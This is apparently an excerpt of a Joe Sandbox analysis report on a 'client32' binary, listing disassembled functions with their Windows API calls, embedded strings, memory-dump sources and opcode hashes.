Function 11005160 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1100516E
_memset.LIBCMT ref: 11005190
GetMenuItemID.USER32(?,00000000), ref: 110051A4
CheckMenuItem.USER32(?,00000000,00000000), ref: 11005201
EnableMenuItem.USER32(?,00000000,00000000), ref: 11005217
GetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005238
SetMenuItemInfoA.USER32(?,00000000,00000001,00000030), ref: 11005264

Strings

0, xrefs: 1100519D

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$CheckCountEnable_memset
String ID: 0
API String ID: 2755257978-4108050209
Opcode ID: ed69649b84937dec283889605bbfa775386e748c32dea1dcd3e91a15f451bfe3
Instruction ID: ba601667d0dbcbc68abddaeb712eeca770598da9b47231f1fad8371f9a74750a
Opcode Fuzzy Hash: ed69649b84937dec283889605bbfa775386e748c32dea1dcd3e91a15f451bfe3
Instruction Fuzzy Hash: 0131A070D0121ABBEB01DFA4D884BEEBBFCEF46398F008159F941E6240E7759A04CB60

Function 1101D400 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 100registryCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 1101D430
GetClassInfoExA.USER32(00000000,NSMChatSizeWnd,?), ref: 1101D44A
_memset.LIBCMT ref: 1101D45A
RegisterClassExA.USER32(?), ref: 1101D49B
CreateWindowExA.USER32(00000000,NSMChatSizeWnd,11190240,00CF0000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 1101D4CE
GetWindowRect.USER32(00000000,?), ref: 1101D4DB
DestroyWindow.USER32(00000000), ref: 1101D4E2

Strings

NSMChatSizeWnd, xrefs: 1101D43C, 1101D491, 1101D4C8

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Class_memset$CreateDestroyInfoRectRegister
String ID: NSMChatSizeWnd
API String ID: 2883038198-4119039562
Opcode ID: 0f2d792c6c1c264673f0f5ec2afb6a3a8f1b2095c52e67ec1df01685aa5470b9
Instruction ID: e3645cda286b150cc791e79456e8b4147b922d841ec14d894d1b13321002afd3
Opcode Fuzzy Hash: 0f2d792c6c1c264673f0f5ec2afb6a3a8f1b2095c52e67ec1df01685aa5470b9
Instruction Fuzzy Hash: 043142B5D0121EAFDB10DFA9DDC4BEEFBB8EB48218F20452DF916A7240D73469018B65

Function 11009450 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 92fileCOMMON

Download Yara Rule

APIs

_strncmp.LIBCMT ref: 1100948A
_strncmp.LIBCMT ref: 1100949A
WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,?,?,?,?,?,?,33E68B52), ref: 1100953B

Strings

IsA(), xrefs: 110094F5, 1100951D
https://, xrefs: 1100947F
http://, xrefs: 11009485, 11009498
<tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td , xrefs: 110094C1
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 110094F0, 11009518

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _strncmp$FileWrite
String ID: <tr><td valign="middle" align="center"><p align="center"><img border="0" src="%s" align="left" width="16"> </p></td><td><p align="left"><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><a>%s</a></font></p></td><td> </td><td $IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://$https://
API String ID: 1635020204-3154135529
Opcode ID: 751fdff6ab78abb166e371cad652970b028c8938691f9aa09812d2b5b9ae425b
Instruction ID: c02e7595d714bc6b27a8fc413b3f28a1335074e10200a229c1305b64d3fa4f31
Opcode Fuzzy Hash: 751fdff6ab78abb166e371cad652970b028c8938691f9aa09812d2b5b9ae425b
Instruction Fuzzy Hash: 6D318D75E0061AABDB00DF95CC44FDEB7BCEF49658F014259F925A7280E7356A04CBA1

Function 11099440 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 67libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(shlwapi.dll), ref: 110994B7
GetProcAddress.KERNEL32(00000000,StrRetToStrA), ref: 110994CA
FreeLibrary.KERNEL32(00000000), ref: 110994EF

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Strings

ppszFileNm!=NULL, xrefs: 11099476
ppszTitle!=NULL, xrefs: 11099459
StrRetToStrA, xrefs: 110994C4
shlwapi.dll, xrefs: 110994B2
..\CTL32\IEFavourites.cpp, xrefs: 11099454, 11099471

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Library$AddressErrorExitFreeLastLoadMessageProcProcesswsprintf
String ID: ..\CTL32\IEFavourites.cpp$StrRetToStrA$ppszFileNm!=NULL$ppszTitle!=NULL$shlwapi.dll
API String ID: 1794808332-3123982267
Opcode ID: 6f6ea0c8017bb748690a9d599fd33f7d941fdab32875fa27e2d2b29c4277e3bd
Instruction ID: b331d60ddbc5aaae19da3b9d4643d5645db9cce3ca0cb84768d6be9cae45d0d9
Opcode Fuzzy Hash: 6f6ea0c8017bb748690a9d599fd33f7d941fdab32875fa27e2d2b29c4277e3bd
Instruction Fuzzy Hash: 0011937AA0011A6FD711DE55EC84FEBB76CEB95394F048154F90993240EB70A945CBA1

Function 1100D3A0 Relevance: 13.6, APIs: 9, Instructions: 75libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,111918F0), ref: 1100D3B4
GetProcAddress.KERNEL32(00000000,111918E0), ref: 1100D3C8
GetProcAddress.KERNEL32(00000000,111918D0), ref: 1100D3DD
GetProcAddress.KERNEL32(00000000,111918C0), ref: 1100D3F1
GetProcAddress.KERNEL32(00000000,111918B4), ref: 1100D405
GetProcAddress.KERNEL32(00000000,11191894), ref: 1100D41A
GetProcAddress.KERNEL32(00000000,11191874), ref: 1100D42E
GetProcAddress.KERNEL32(00000000,11191864), ref: 1100D442
GetProcAddress.KERNEL32(00000000,11191854), ref: 1100D457

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: e0ae5740138e18821e3a24a89387d613ab946f1d9d6b2b3a6b9a3a6b3fa5a763
Instruction ID: 133235a5dede8c45fdea6c588508a5ee8612860ef75b37f964a6b1024f1665f3
Opcode Fuzzy Hash: e0ae5740138e18821e3a24a89387d613ab946f1d9d6b2b3a6b9a3a6b3fa5a763
Instruction Fuzzy Hash: 3331BCB59126349FF706DBE8C8C5A76B7E9A748718F00857AE42083258D7B4AC80CFE1

Function 1103D280 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 319COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 1103D313
_memset.LIBCMT ref: 1103D321
_memmove.LIBCMT ref: 1103D32E

Part of subcall function 110290C0: GetLastError.KERNEL32(?,00000000,?), ref: 110290DC
Part of subcall function 110290C0: wsprintfA.USER32 ref: 11029127
Part of subcall function 110290C0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029163
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 11029179

Part of subcall function 1103D000: Sleep.KERNEL32(000001F4,00000000,?,00000000,-111E8454), ref: 1103D031

Part of subcall function 110290C0: _strrchr.LIBCMT ref: 110291B5
Part of subcall function 110290C0: ExitProcess.KERNEL32 ref: 110291F4

Strings

IsA(), xrefs: 1103D2C4, 1103D2F3, 1103D352, 1103D388, 1103D3D1, 1103D43E, 1103D497, 1103D521, 1103D554, 1103D5BE, 1103D5F5
redirect:, xrefs: 1103D3F8
PF%sinclude:*exclude:, xrefs: 1103D3E2
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D2BF, 1103D2EE, 1103D34D, 1103D383, 1103D3CC, 1103D439, 1103D492, 1103D51C, 1103D54F, 1103D5B9, 1103D5F0

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ExitProcess$ErrorLastMessageSleep_malloc_memmove_memset_strrchrwsprintf
String ID: IsA()$PF%sinclude:*exclude:$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$redirect:
API String ID: 3725223747-3293259664
Opcode ID: 835a85e2e76ba731cc47dc4224ca25b8315324302a19e19a65d98dcadd3fece4
Instruction ID: 2973721dda51d4375ed7ba57751720d06068f42375d5ed4393b8cac30ed117a9
Opcode Fuzzy Hash: 835a85e2e76ba731cc47dc4224ca25b8315324302a19e19a65d98dcadd3fece4
Instruction Fuzzy Hash: E5B1C235E0191A9FDB06DF94DC94FEEB7B5EF85208F448258EC2567290EB34A908CBD1

Function 1106D080 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 190COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,33E68B52,?,76937CB0,76937AA0), ref: 1106D102
SetEvent.KERNEL32(?,?,00000000,1106AF70,?,?), ref: 1106D1E2

Strings

erased=%d, idata->dead=%d, xrefs: 1106D2B3
..\ctl32\Connect.cpp, xrefs: 1106D2CA
Deregister NC_CHATEX for conn=%s, q=%p, xrefs: 1106D0E5

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalEnterEventSection
String ID: ..\ctl32\Connect.cpp$Deregister NC_CHATEX for conn=%s, q=%p$erased=%d, idata->dead=%d
API String ID: 2291802058-2272698802
Opcode ID: 813a7232b034f6144db0d4d7ea3462f383952e4aa83488041cd1c980c73132e3
Instruction ID: 99872d5b1e15df2ba1248a11d837dfcc44334b10e4762b2090e01d9043681442
Opcode Fuzzy Hash: 813a7232b034f6144db0d4d7ea3462f383952e4aa83488041cd1c980c73132e3
Instruction Fuzzy Hash: 6771C0B0E00296EFE715CF64C884F9EBBF9AB04324F1481D9E44A9B291D734E9C5CB90

Function 1101D540 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 188COMMON

Download Yara Rule

APIs

InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5B4
InflateRect.USER32(?,000000FF,000000FF), ref: 1101D5E4
InflateRect.USER32(?,000000FF,000000FF), ref: 1101D608
GetBkColor.GDI32(?), ref: 1101D60E
GetTextColor.GDI32(?), ref: 1101D695

Strings

VUUU, xrefs: 1101D646
VUUU, xrefs: 1101D6E0

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: InflateRect$Color$Text
String ID: VUUU$VUUU
API String ID: 1214208285-3149182767
Opcode ID: f08a4eeb430e5e40de2adc65d3df484e94e58c05f2703d116b567d6bb213df73
Instruction ID: cd44d9c8e78e9e990804dbbc1eca3e8423565eb1bbc3582a46d0fc845a82d456
Opcode Fuzzy Hash: f08a4eeb430e5e40de2adc65d3df484e94e58c05f2703d116b567d6bb213df73
Instruction Fuzzy Hash: 3C616075E0021A9BCB04DFA8D881AAEF7F5FF98324F148619E415E7385E634FA05CB90

Function 110B3370 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 185COMMON

Download Yara Rule

APIs

Part of subcall function 1110C580: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,7736C3F0,?,1110D2DD,00000000,00000001,?,?,?,?,?,110309CC), ref: 1110C59E

Part of subcall function 1110C4B0: _malloc.LIBCMT ref: 1110C4C9
Part of subcall function 1110C4B0: wsprintfA.USER32 ref: 1110C4E4
Part of subcall function 1110C4B0: _memset.LIBCMT ref: 1110C507

InitializeCriticalSection.KERNEL32(0000002C,?,?,?,?,?,?,?,00000000,111812D6,000000FF), ref: 110B33F5
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000,111812D6,000000FF), ref: 110B33FF
GetVersion.KERNEL32(?,?,?,?,?,?,?,00000000,111812D6,000000FF), ref: 110B341A
std::exception::exception.LIBCMT ref: 110B3469
__CxxThrowException@8.LIBCMT ref: 110B347E
std::_Xinvalid_argument.LIBCPMT ref: 110B34CD

Strings

vector<T> too long, xrefs: 110B34C8

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CreateEvent$CriticalException@8InitializeSectionThrowVersionXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
String ID: vector<T> too long
API String ID: 2799244587-3788999226
Opcode ID: ca2f754474b94c14361499489e8c6958c63624d769179a60de9151b271635edb
Instruction ID: fabf65b63d2477a14e506558ca8eecc837ccc66aa4ad8f5c9d11cc63dd9eaa79
Opcode Fuzzy Hash: ca2f754474b94c14361499489e8c6958c63624d769179a60de9151b271635edb
Instruction Fuzzy Hash: 625160B5D04705AFC714DF69C880A9AFBF8FB48304F50892EE95A97640E775B904CFA1

Function 1100F2E0 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 1100F30D
std::_Lockit::_Lockit.LIBCPMT ref: 1100F330
std::bad_exception::bad_exception.LIBCMT ref: 1100F3B4
__CxxThrowException@8.LIBCMT ref: 1100F3C2
std::_Lockit::_Lockit.LIBCPMT ref: 1100F3D5
std::locale::facet::_Facet_Register.LIBCPMT ref: 1100F3EF

Strings

bad cast, xrefs: 1100F3AC

Memory Dump Source

Source File: 00000004.00000002.4575378852.0000000011001000.00000020.00000001.01000000.00000008.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.4575364338.0000000011000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575479894.000000001118F000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575517023.00000000111DC000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575534457.00000000111EB000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000111F1000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011257000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001127C000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011283000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.000000001128A000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011297000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112A7000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112AD000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.00000000112D9000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4575552486.0000000011325000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: LockitLockit::_std::_$Exception@8Facet_RegisterThrowstd::bad_exception::bad_exceptionstd::locale::facet::_
String ID: bad cast
API String ID: 2427920155-3145022300
Opcode ID: 728a32eaeb05f4af535badae1fbf694374bd09ca27186dc10fa6460706712be1
